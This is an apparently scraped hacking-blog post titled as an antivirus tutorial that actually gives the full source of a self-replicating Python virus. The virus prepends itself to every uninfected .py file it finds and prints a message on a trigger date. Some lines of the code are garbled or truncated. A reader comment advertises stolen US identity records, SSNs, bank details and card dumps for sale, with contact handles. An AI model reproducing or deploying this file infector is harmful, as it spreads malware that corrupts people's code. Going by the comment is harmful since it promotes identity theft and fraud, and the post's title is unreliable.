Follow Us @soratemplates

Friday, April 13, 2018

HACKING ZONE : simple way to make antivirus using Python

Python Virus !! Lets code a simple Virus easily in Python, Python, as you know, is widely used by Hackers to code different scripts to ease their task, Now let us Make a Virus in Python.
This simple Python Script when executed searches for Python files and makes the strings in the file to the following – “EthicalHackx is Watching YOU”.
NOTE: This is just for EDUCATIONAL Purpose and run in Safe Environment ( Virtual Box)
What Do You Think on This ? Say Here a Facebook d Twitter f Google+
J WhatsApp 1
How To Find IP & MAC Addresses on Network How to Use X-XSS-Protection for Evil Run Kali Linux on Windows 10 – Download From Windows Store
Information Gathering : First Step to Hacking Xnspy: The iPhone 7 Spying App Review Loopholes in Aadhaar authentication API services RELATED ARTICLES MORE FROM AUTHOR
Beginner Hacking CROSS SITE SCR... Hacking Tools &...
Beginner Hacking Hacking Software Hacking Tutorials
  1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39 #!/usr/bin/python
import os
import datetime
SIGNATURE = "SIMPLE PYTHON VIRUS"
def search ( path ):
filestoinfect = []
filelist = os. listdir( path )
for fname in filelist :
if os.path . isdir ( path + "/" + fname ):
filestoinfect . extend ( search ( path + "/" + fname))
elif fname [ - 3 :] == ".py" :
infected = False
for line in open ( path + "/" +fname ) :
if SIGNATURE in line :
infected = True
break
if infected == False :
filestoinfect . append ( path +"/" + fname )
return filestoinfect
def infect ( filestoinfect ):
virus = open ( os.path . abspath ( __file__ ))
virusstring = ""
for i ,line in enumerate ( virus ) :
if i & gt ; = 0 and i & lt ; 39 :
virusstring += line
virus . close
for fname in filestoinfect :
f = open ( fname )
temp = f . read ()
f . close ()
f = open ( fname ,"w" )
f . write( virusstring + temp )
f . close ()
def bomb () :
if datetime . datetime . now (). month == 1 and datetime . d
print "EthicalHackx is Watching YOU"
filestoinfect = search ( os.path . abspath ( "" ))
infect ( filestoinfect )
bomb ()

2 comments:

  1. Selling USA FRESH SPAMMED SSN Leads/Fullz, along with Driving License/ID Number with EXCELLENT connectivity.

    **PRICE**
    >>2$ FOR EACH LEAD/FULLZ/PROFILE
    >>5$ FOR EACH PREMIUM LEAD/FULLZ/PROFILE

    **DETAILS IN EACH LEAD/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER WITH EXPIRY DATE
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL, I.P ADDRESS
    ->EMPLOYEE DETAILS
    ->REALTIONSHIP DETAILS
    ->MORTGAGE INFO
    ->BANK ACCOUNT DETAILS

    >All Leads are Tested & Verified.
    >Invalid info found, will be replaced.
    >Serious buyers will be welcome & I will give discounts for bulk orders.
    >Fresh spammed data of USA Credit Bureau
    >Good credit Scores, 700 minimum scores
    >Bulk order will be preferable
    >Minimum order 20 leads/fullz
    >Hope for the long term business
    >You can asked for samples, specific states & zips (if needed)
    >Payment mode BTC, PAYPAL & PERFECT MONEY

    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ''OTHER GADGETS PROVIDING''

    >Dead Fullz
    >Carding Tutorials
    >Hacking Tutorials
    >SMTP Linux Root
    >DUMPS with pins track 1 and 2
    >Sock Tools
    >Server I.P's
    >USA emails with passwords (bulk order preferable)

    **Contact 24/7**

    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  2. Thank you for sharing this useful information. Do you know Antivirus is really necessary if you want to keep your Computer, laptop, phone, or another electronic device that comes enabled with webcams are safe. If you want to know about antivirus follow our blog, and here is our latest blog:- What is Virus Signature.

    ReplyDelete